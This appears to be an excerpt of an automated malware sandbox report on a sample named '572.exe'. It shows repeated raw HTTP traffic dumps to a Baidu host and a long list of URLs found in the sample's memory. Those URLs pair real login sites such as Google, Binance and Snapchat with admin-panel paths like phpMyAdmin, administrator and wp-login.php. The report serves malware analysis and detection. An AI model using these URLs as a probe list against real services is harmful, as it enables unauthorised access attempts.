66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 Data Ascii: 300Y{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/Ta
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: keep-aliveContent-Encoding: gzipContent-Type: text/htmlDate: Mon, 05 Feb 2024 11:16:17 GMTEtag: W/"62650964-3feb"Logid: 8900822735141870389P3p: CP=" OTI DSP COR IVA OUR IND COM "Server: nginxSet-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;Set-Cookie: BAIDUID=1773582DABE69F520ED57F4947DABDC1:FG=1; expires=Tue, 04-Feb-25 11:16:17 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1Vary: Accept-EncodingVary: Accept-EncodingX-Powered-By: BaiduCloudYld: 8900822735141870389Yme: ZIGW/y8rV0UMaTQNUmr/tG1LteUfQwbrqwZPySKDnO8=Transfer-Encoding: chunkedData Raw: 33 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 Data Ascii: 300Y{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/Ta
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: keep-aliveContent-Encoding: gzipContent-Type: text/htmlDate: Mon, 05 Feb 2024 11:16:17 GMTEtag: W/"62650964-3feb"Logid: 8900822735141870389P3p: CP=" OTI DSP COR IVA OUR IND COM "Server: nginxSet-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;Set-Cookie: BAIDUID=1773582DABE69F520ED57F4947DABDC1:FG=1; expires=Tue, 04-Feb-25 11:16:17 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1Vary: Accept-EncodingVary: Accept-EncodingX-Powered-By: BaiduCloudYld: 8900822735141870389Yme: ZIGW/y8rV0UMaTQNUmr/tG1LteUfQwbrqwZPySKDnO8=Transfer-Encoding: chunkedData Raw: 33 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 Data Ascii: 300Y{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/Ta
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0260049m.index-education.net/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0260049m.index-education.net/PhpMyAdmin/b
                Source: 572.exe, 00000009.00000003.4307098588.00000000061FA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0260049m.index-education.net/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0260049m.index-education.net/administrator/3x
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0260049m.index-education.net/administrator/j
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0260049m.index-education.net/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0260049m.index-education.net/phpMyAdmin/H
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0260049m.index-education.net/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0260049m.index-education.net/phpmyadmin/k
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0260049m.index-education.net/pma/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://21dukes.com/administrator/
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://21dukes.com/administrator/?~
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://21dukes.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://21dukes.com/administrator/index.php.
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3fba-180-252-166-236.ngrok.io/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3fba-180-252-166-236.ngrok.io/administrator/q
                Source: 572.exe, 00000009.00000003.4306089773.000000004E7CE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3fba-180-252-166-236.ngrok.io/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E7CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3fba-180-252-166-236.ngrok.io/phpmyadmin/er.com.ar
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://academico.um.edu.mx/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://academico.um.edu.mx/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.booking.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.booking.com/PhpMyAdmin/?d
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.booking.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.booking.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.booking.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.live.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.live.com/administrator/P
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.live.com/administrator/in
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.live.com/administrator/j
                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.live.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.live.com/phpmyadmin/e=404Xb
                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.live.com/phpmyadmin/sion
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.mojang.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.mojang.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.mojang.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.mojang.com/phpMyAdmin/=B&
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://account.mojang.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.binance.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.binance.com/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E7CE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E14B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4327514305.000000004D9A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.binance.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4315918557.000000004E14B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.binance.com/administrator/index.phpd.com46595
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.binance.com/pma/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.binance.com/wp-login.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.binance.com/wp-login.php8
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.binance.com/wp-login.phpY
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.ecitizen.go.ke/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.ecitizen.go.ke/PhpMyAdmin/0
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.ecitizen.go.ke/PhpMyAdmin/corp.com
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.ecitizen.go.ke/admin.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.ecitizen.go.ke/admin.phphp
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.ecitizen.go.ke/administrator/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.ecitizen.go.ke/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.ecitizen.go.ke/phpMyAdmin/com
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.ecitizen.go.ke/phpMyAdmin/f
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.ecitizen.go.ke/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.ecitizen.go.ke/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.faceit.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.faceit.com/administrator/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.faceit.com/administrator//
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.faceit.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.faceit.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.faceit.com/phpmyadmin/b
                Source: 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/PhpMyAdmin/?
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/PhpMyAdmin/mra.com)
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/admin
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/admin.php
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/admin.phpe.com
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/admin.phpo:143
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/admin.phpom
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/administrator/
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/administrator/9
                Source: 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/administrator/index.phpC
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/administrator/index.phpb
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/administrator/q
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/administrator/trator/
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/administrator/z
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/adminn/.saludtotal.com.co
                Source: 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/om
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/phpMyAdmin/3
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/phpMyAdmin/B
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/phpmyadmin/(
                Source: 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/phpmyadmin/=
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/phpmyadmin/k
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/phpmyadmin/m
                Source: 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/phpmyadmin/w
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.snapchat.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.snapchat.com/PhpMyAdmin/$dA
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.snapchat.com/administrator/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.snapchat.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.snapchat.com/phpMyAdmin/com/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.snapchat.com/phpMyAdmin/min/)
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.snapchat.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.snapchat.com/phpmyadmin/)N
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.snapchat.com/phpmyadmin/)Nq6
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accounts.snapchat.com/pma/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aeaaamorim.inovarmais.com/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aeaaamorim.inovarmais.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4427379374.00000000391DC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aeaaamorim.inovarmais.com/admin
                Source: 572.exe, 00000009.00000003.4427379374.00000000391DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aeaaamorim.inovarmais.com/admin)J
